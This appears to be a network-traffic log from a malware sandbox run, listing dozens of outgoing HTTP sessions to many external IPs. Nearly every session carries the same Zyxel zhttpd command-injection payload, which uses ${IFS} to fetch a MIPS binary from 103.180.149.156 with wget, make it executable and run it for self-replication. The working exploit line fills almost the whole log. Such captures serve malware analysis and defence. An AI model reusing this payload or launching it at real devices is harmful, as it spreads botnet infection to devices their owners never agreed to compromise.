                                            Feb 2, 2024 06:20:48.307518959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            534192.168.2.155618651.136.240.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:48.307549953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            535192.168.2.1558588211.89.57.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:48.307595968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            536192.168.2.155730865.184.189.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:48.307629108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            537192.168.2.1559266116.171.134.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:48.307666063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            538192.168.2.155090834.124.217.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:48.307687998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            539192.168.2.1550108160.175.79.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.311875105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            540192.168.2.155401689.97.109.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.311933994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            541192.168.2.154690885.51.58.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.311942101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            542192.168.2.153895417.105.112.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.311943054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            543192.168.2.1553470192.67.213.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.311974049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            544192.168.2.1555470160.29.44.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312000990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            545192.168.2.154248086.114.116.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312050104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            546192.168.2.1546990130.201.223.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312094927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            547192.168.2.153461864.193.6.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312127113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            548192.168.2.154658280.131.212.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312161922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            549192.168.2.1533468195.151.237.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312184095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            550192.168.2.153730649.102.69.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312227011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            551192.168.2.15486801.42.115.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312259912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            552192.168.2.155725849.137.253.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312350988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            553192.168.2.1541386147.75.134.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312484980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            554192.168.2.155287842.56.61.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312674046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            555192.168.2.153349096.232.250.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312839031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            556192.168.2.153844278.44.118.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:49.312839031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            557192.168.2.1542448139.251.149.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:50.317190886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            558192.168.2.1547720107.74.240.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:50.317245960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            559192.168.2.15569981.73.3.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:50.317295074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            560192.168.2.155848039.73.145.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:51.321280956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            561192.168.2.1545344138.141.202.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:51.321322918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            562192.168.2.1552172131.45.104.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:51.321358919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            563192.168.2.1550066107.208.215.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:51.321402073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            564192.168.2.1537754148.167.77.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:51.321423054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            565192.168.2.1534366217.111.212.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:51.321527004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            566192.168.2.1545918119.0.157.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:51.321583033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            567192.168.2.153754051.243.30.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:52.325687885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            568192.168.2.154013863.97.138.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:52.325736046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            569192.168.2.1541026122.2.76.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:54.333185911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            570192.168.2.1535292140.14.104.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:54.333249092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            571192.168.2.154461024.220.227.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337477922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            572192.168.2.153446484.151.87.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337510109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            573192.168.2.1550632151.49.1.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337552071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            574192.168.2.1555698102.154.219.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337582111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            575192.168.2.154951264.96.173.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337603092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            576192.168.2.154859891.211.139.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337671041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            577192.168.2.154303486.177.210.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337687969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            578192.168.2.1556540141.32.89.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337805986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            579192.168.2.155949258.79.106.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337842941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            580192.168.2.1553378181.205.225.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:55.337907076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            581192.168.2.1558666176.32.138.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:56.341558933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            582192.168.2.1559350152.97.9.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:56.341583967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            583192.168.2.154352624.201.187.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:56.341614008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            584192.168.2.1547040131.88.184.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:56.341665030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            585192.168.2.153574463.117.81.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:56.341694117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            586192.168.2.1539948125.144.150.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:56.341778994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            587192.168.2.1558268165.249.137.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:57.345629930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            588192.168.2.1543156158.182.181.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:57.345649004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            589192.168.2.154678897.80.252.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:57.345693111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            590192.168.2.1557040217.34.72.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:57.345750093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            591192.168.2.1560548123.106.191.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:57.345787048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            592192.168.2.154696074.207.111.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:57.345809937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            593192.168.2.153343895.222.63.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:57.345901012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            594192.168.2.1533368208.48.239.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:57.345949888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            595192.168.2.1551522142.245.118.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.354969025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            596192.168.2.1557724136.218.103.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355005980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            597192.168.2.154121889.214.191.200443
                                            TimestampBytes transferredDirectionData
